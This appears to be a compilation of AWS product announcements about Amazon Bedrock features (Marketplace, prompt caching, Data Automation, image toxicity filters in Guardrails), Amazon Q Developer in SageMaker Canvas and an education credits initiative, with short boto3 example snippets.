Amazon Bedrock Marketplace empowers generative AI developers to rapidly test and incorporate a diverse array of emerging, popular, and leading FMs of various types and sizes. Customers can choose from a variety of models tailored to their unique requirements, which can help accelerate the time-to-market, improve the accuracy, or reduce the cost of their generative AI workflows. For example, customers can incorporate models highly-specialized for finance or healthcare, or language translation models for Asian languages, all from a single place.
Amazon Bedrock Marketplace is supported in US East (N. Virginia), US East (Ohio), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Paris), and South America (São Paulo).
For more information, please refer to Amazon Bedrock Marketplace’s announcement blog or documentation.
Today, AWS announces that Amazon Bedrock now supports prompt caching. Prompt caching is a new capability that can reduce costs by up to 90% and latency by up to 85% for supported models by caching frequently used prompts across multiple API calls. It allows you to cache repetitive inputs and avoid reprocessing context, such as long system prompts and common examples that help guide the model’s response. When the cache is used, fewer computing resources are needed to generate output. As a result, not only can we process your request faster, but we can also pass along the cost savings from using fewer resources.
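A minimal boto3 sketch of the idea, assuming the Converse API accepts a cache checkpoint block after a long, static system prompt so that subsequent calls reuse the cached prefix; the model ID and prompt text are illustrative:

```python
import boto3

bedrock_runtime = boto3.client("bedrock-runtime")

# A long, static prefix worth caching (placeholder text).
long_system_prompt = "You are a contract-review assistant. <policy text and many worked examples>"

response = bedrock_runtime.converse(
    modelId="us.anthropic.claude-3-5-haiku-20241022-v1:0",  # cross-region inference profile
    system=[
        {"text": long_system_prompt},
        # Everything before this cache checkpoint is cached and reused on
        # subsequent calls instead of being reprocessed from scratch.
        {"cachePoint": {"type": "default"}},
    ],
    messages=[{"role": "user", "content": [{"text": "Review this clause: ..."}]}],
)

# Usage metadata reports cache reads/writes when caching applies.
print(response["usage"])
```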
Amazon Bedrock is a fully managed service that offers a choice of high-performing FMs from leading AI companies via a single API. Amazon Bedrock also provides a broad set of capabilities customers need to build generative AI applications with security, privacy, and responsible AI capabilities built in. These capabilities help you build tailored applications for multiple use cases across different industries, helping organizations unlock sustained growth from generative AI while providing tools to build customer trust and data governance.
Prompt caching is now available on Claude 3.5 Haiku and Claude 3.5 Sonnet v2 in US West (Oregon) and US East (N. Virginia) via cross-region inference, and Nova Micro, Nova Lite, and Nova Pro models in US East (N. Virginia). At launch, only a select number of customers will have access to this feature. To learn more about participating in the preview, see this page. To learn more about prompt caching, see our documentation and blog.
Today, we are announcing the preview launch of Amazon Bedrock Data Automation (BDA), a new feature of Amazon Bedrock that enables developers to automate the generation of valuable insights from unstructured multimodal content such as documents, images, video, and audio to build GenAI-based applications. These insights include video summaries of key moments, detection of inappropriate image content, automated analysis of complex documents, and much more. Developers can also customize BDA’s output to generate specific insights in consistent formats required by their systems and applications.
By leveraging BDA, developers can reduce development time and effort, making it easier to build intelligent document processing, media analysis, and other multimodal, data-centric automation solutions. BDA offers high accuracy at lower cost than alternative solutions, along with features such as visual grounding with confidence scores for explainability and built-in hallucination mitigation, ensuring accurate insights from unstructured, multimodal content. Developers can get started with BDA on the Bedrock console, where they can configure and customize output using their sample data. They can then integrate BDA’s unified multimodal inference API into their applications to process unstructured content at scale with high accuracy and consistency. BDA is also integrated with Bedrock Knowledge Bases, making it easier for developers to generate meaningful information from their unstructured multimodal content to provide more relevant responses for retrieval augmented generation (RAG).
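The runtime integration might look roughly like the following sketch; the client name, operation, and parameter shapes are assumptions based on the description above and may differ from the actual BDA API:

```python
import boto3

# Client name, operation, and parameter shapes here are assumptions based on
# the description above; consult the BDA documentation for the actual API.
bda_runtime = boto3.client("bedrock-data-automation-runtime")

job = bda_runtime.invoke_data_automation_async(
    inputConfiguration={"s3Uri": "s3://my-bucket/contracts/msa.pdf"},
    outputConfiguration={"s3Uri": "s3://my-bucket/bda-output/"},
    dataAutomationConfiguration={
        "dataAutomationArn": "arn:aws:bedrock:us-west-2:111122223333:data-automation-project/my-project"
    },
)

# Results (standard or customized insights) land in the output S3 prefix;
# the invocation ARN can be polled for completion status.
print(job["invocationArn"])
```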
Bedrock Data Automation is available in preview in US West (Oregon) AWS Region.
To learn more, visit the Bedrock Data Automation page.
Organizations are increasingly using applications with multimodal data to drive business value, improve decision-making, and enhance customer experiences. Amazon Bedrock Guardrails now supports multimodal toxicity detection for image content, enabling organizations to apply content filters to images. This new capability with Guardrails, now in public preview, removes the heavy lifting otherwise required of customers to build their own safeguards for image data or spend cycles on manual evaluation that can be error-prone and tedious.
Bedrock Guardrails helps customers build and scale their generative AI applications responsibly for a wide range of use cases across industry verticals including healthcare, manufacturing, financial services, media and advertising, transportation, marketing, education, and much more. With this new capability, Amazon Bedrock Guardrails offers a comprehensive solution, enabling the detection and filtration of undesirable and potentially harmful image content while retaining safe and relevant visuals. Customers can now use content filters for both text and image data in a single solution with configurable thresholds to detect and filter undesirable content across categories such as hate, insults, sexual, and violence, and build generative AI applications based on their responsible AI policies.
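A boto3 sketch of the idea, assuming the CreateGuardrail content filters accept input and output modality lists and that ApplyGuardrail accepts an image content block, as the multimodal preview described above suggests; field values are illustrative:

```python
import boto3

bedrock = boto3.client("bedrock")
bedrock_runtime = boto3.client("bedrock-runtime")

# Create a guardrail whose content filters cover images as well as text;
# the modality fields reflect the multimodal preview described above.
guardrail = bedrock.create_guardrail(
    name="multimodal-safety",
    blockedInputMessaging="This input was blocked by policy.",
    blockedOutputsMessaging="This response was blocked by policy.",
    contentPolicyConfig={
        "filtersConfig": [
            {
                "type": "VIOLENCE",
                "inputStrength": "HIGH",
                "outputStrength": "HIGH",
                "inputModalities": ["TEXT", "IMAGE"],
                "outputModalities": ["TEXT", "IMAGE"],
            }
        ]
    },
)

# Evaluate an image directly, independent of any model invocation.
with open("user_upload.png", "rb") as f:
    result = bedrock_runtime.apply_guardrail(
        guardrailIdentifier=guardrail["guardrailId"],
        guardrailVersion="DRAFT",
        source="INPUT",
        content=[{"image": {"format": "png", "source": {"bytes": f.read()}}}],
    )

print(result["action"])  # "GUARDRAIL_INTERVENED" if the image is filtered
```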
This new capability in preview is available with all foundation models (FMs) on Amazon Bedrock that support images, including fine-tuned FMs, in 11 AWS Regions globally: US East (N. Virginia), US East (Ohio), US West (Oregon), Europe (Ireland), Europe (Frankfurt), Europe (London), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Tokyo), Asia Pacific (Mumbai), and AWS GovCloud (US-West).
Starting today, you can build ML models using natural language with Amazon Q Developer, now available in Amazon SageMaker Canvas in preview. You can now get generative AI-powered assistance throughout the ML lifecycle, from data preparation to model deployment. With Amazon Q Developer, users of all skill levels can use natural language to access expert guidance to build high-quality ML models, accelerating innovation and time to market.
Amazon Q Developer will break down your objective into specific ML tasks, define the appropriate ML problem type, and apply data preparation techniques to your data. Amazon Q Developer then guides you through the process of building, evaluating, and deploying custom ML models. ML models produced in SageMaker Canvas with Amazon Q Developer are production-ready: they can be registered in SageMaker Studio, and their code can be shared with data scientists for integration into downstream MLOps workflows.
Amazon Q Developer is available in SageMaker Canvas in preview in the following AWS Regions: US East (N. Virginia), US West (Oregon), Europe (Frankfurt), Europe (Paris), Asia Pacific (Tokyo), and Asia Pacific (Seoul). To learn more about using Amazon Q Developer with SageMaker Canvas, visit the website, read the AWS News blog, or view the technical documentation.
Through the AWS Education Equity Initiative, Amazon announces a five-year commitment of cloud technology and technical support for organizations creating digital learning solutions that expand access for underserved learners worldwide. While the use of educational technologies continues to rise, many organizations lack access to the cloud computing and AI resources needed to accelerate and scale their work to reach more learners in need.
Amazon is committing up to $100 million in AWS credits and technical advising to help socially minded organizations build and scale learning solutions that utilize cloud and AI technologies. This will reduce initial financial barriers and provide guidance on building and scaling AI-powered education solutions using AWS technologies.
Eligible recipients, including socially minded edtechs, social enterprises, non-profits, governments, and corporate social responsibility teams, must demonstrate how their solution will benefit students from underserved communities. The initiative is now accepting applications.